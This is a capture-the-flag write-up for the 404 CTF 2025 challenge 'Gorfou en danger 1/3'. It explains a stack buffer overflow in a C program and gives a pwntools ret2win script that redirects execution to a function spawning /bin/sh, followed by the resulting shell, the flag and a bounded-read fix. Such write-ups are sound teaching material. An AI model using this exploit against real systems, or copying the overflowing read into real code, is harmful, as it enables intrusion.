Gorfou en danger 1/3 | 404 CTF 2025
Gorfou en danger 1/3
Resources
A sandstorm of unprecedented intensity has struck our Martian station “Fermat”, leaving our agent Cody stranded and most of our systems out of service. Our only hope lies in exploiting an old access console, obsolete but still functional. That way we could remotely start the rescue rocket where Cody is desperately waiting.
Host : challenges.404ctf.fr Port : 32462
gorfou-en-danger-1
├── chall
└── main.c
Analysis
First, I ran the program to see what it expects:
__
/\ \
/ \ \ .--------------------------------------------------------.
/ /\ \ \ |░█▀▄░█▀▀░█▀▀░█▀▀░░░█▀▀░█▀█░█▀█░█▀▀░█▀█░█░░░█▀▀░░░█░█░▀█░|
/ / /\ \ \ |░█░█░█░█░▀▀█░█░█░░░█░░░█░█░█░█░▀▀█░█░█░█░░░█▀▀░░░▀▄▀░░█░|
/ / /__\_\ \ |░▀▀░░▀▀▀░▀▀▀░▀▀▀░░░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀|
/ / /________\ '--------------------------------------------------------'
\/___________/
Terminal de contrôle à distance de la base martienne Fermat
> help
Commande inconnue
> test
Commande inconnue
The program is a terminal that accepts commands, but we don’t know which commands it accepts. Let’s look at main.c to see if we can find something interesting.
main()
int main(void) {
    while (1) {
        take_command();
    }
    return 0;
}
main() loops forever, calling take_command() on each iteration.
take_command()
void take_command() {
    char command[0x100];
    printf("> ");
    /* reads up to 0x130 bytes into a 0x100-byte buffer */
    read(0, command, 0x130);
    printf("Commande inconnue\n");
}
This function allocates a 0x100-byte (256-byte) buffer on the stack and reads input into it. But read() is told to accept up to 0x130 bytes (304), which is 48 more than the buffer holds, so this is our buffer overflow.
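For contrast, here is a bounded version of the read, as an added example that is not part of the challenge's main.c; the helper read_command(), the CMD_MAX constant and the demo_overlong_input() self-check are names assumed for illustration. It derives the read limit from the buffer size and feeds the same 0x130 bytes through a pipe to show that data next to the buffer stays intact.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>

#define CMD_MAX 0x100  /* same buffer size as command[] in main.c */

/* Hypothetical hardened reader: stores at most cap-1 bytes in buf and
 * always NUL-terminates. Returns the command length, or -1 on EOF/error.
 * Bytes beyond cap-1 stay in the stream for the next read. */
ssize_t read_command(int fd, char *buf, size_t cap) {
    ssize_t n;
    if (cap == 0) return -1;
    do {
        n = read(fd, buf, cap - 1);  /* limit comes from the buffer size */
    } while (n < 0 && errno == EINTR);
    if (n <= 0) return -1;
    buf[n] = '\0';
    buf[strcspn(buf, "\n")] = '\0';  /* drop the trailing newline, if any */
    return (ssize_t)strlen(buf);
}

/* Constructed check: send 0x130 bytes (what the original read() accepted)
 * and verify that the value placed right after the buffer is untouched. */
int demo_overlong_input(void) {
    struct { char command[CMD_MAX]; unsigned long canary; } frame;
    char input[0x130];
    int p[2];
    frame.canary = 0xC0FFEEUL;
    memset(input, 'A', sizeof input);
    if (pipe(p) != 0) return -1;
    if (write(p[1], input, sizeof input) != (ssize_t)sizeof input) return -1;
    close(p[1]);
    ssize_t kept = read_command(p[0], frame.command, sizeof frame.command);
    close(p[0]);
    if (frame.canary != 0xC0FFEEUL) return -2;  /* adjacent data was clobbered */
    return (int)kept;                           /* 255 bytes kept, 49 left unread */
}

int main(void) {
    return demo_overlong_input() == CMD_MAX - 1 ? 0 : 1;
}
```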
There is also another function that is not called that seems interesting.
debug_access()
void debug_access(void) {
    puts("Accès à l'interface de debogage...");
    __asm__(
        ".intel_syntax noprefix;"
        "push 0x0;"
        ".att_syntax;"
    );
    system("/bin/sh");
    return;
}
This function spawns a shell, so we have a basic ret2win.
Goal
The goal is to get a shell by using the buffer overflow. We can do this by overwriting the return address of the take_command() function with the address of the debug_access() function.
Exploit
The only thing we need is the address of the debug_access() function. We can get it in gdb with the info functions command.
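from pwn import *

host = 'challenges.404ctf.fr'
port = 32462
target = remote(host, port)

# Bytes from the start of command[] to the saved return address
# (0x100-byte buffer + 8-byte saved rbp)
OFFSET = 264
# Address of debug_access(), taken from gdb's "info functions"
WIN = 0x00000000004004fd

payload = b'A' * OFFSET + p64(WIN)
target.sendline(payload)
target.interactive()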
Getting flag
python3 exploit.py
[+] Opening connection to challenges.404ctf.fr on port 32462: Done
[*] Switching to interactive mode
__
/\ \
/ \ \ .--------------------------------------------------------.
/ /\ \ \ |░█▀▄░█▀▀░█▀▀░█▀▀░░░█▀▀░█▀█░█▀█░█▀▀░█▀█░█░░░█▀▀░░░█░█░▀█░|
/ / /\ \ \ |░█░█░█░█░▀▀█░█░█░░░█░░░█░█░█░█░▀▀█░█░█░█░░░█▀▀░░░▀▄▀░░█░|
/ / /__\_\ \ |░▀▀░░▀▀▀░▀▀▀░▀▀▀░░░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀|
/ / /________\ '--------------------------------------------------------'
\/___________/
Terminal de contrôle à distance de la base martienne Fermat
> Commande inconnue
Accès à l'interface de debogage...
$ cat flag.txt
404CTF{c@n_7He_GoRF0u_F1y_?}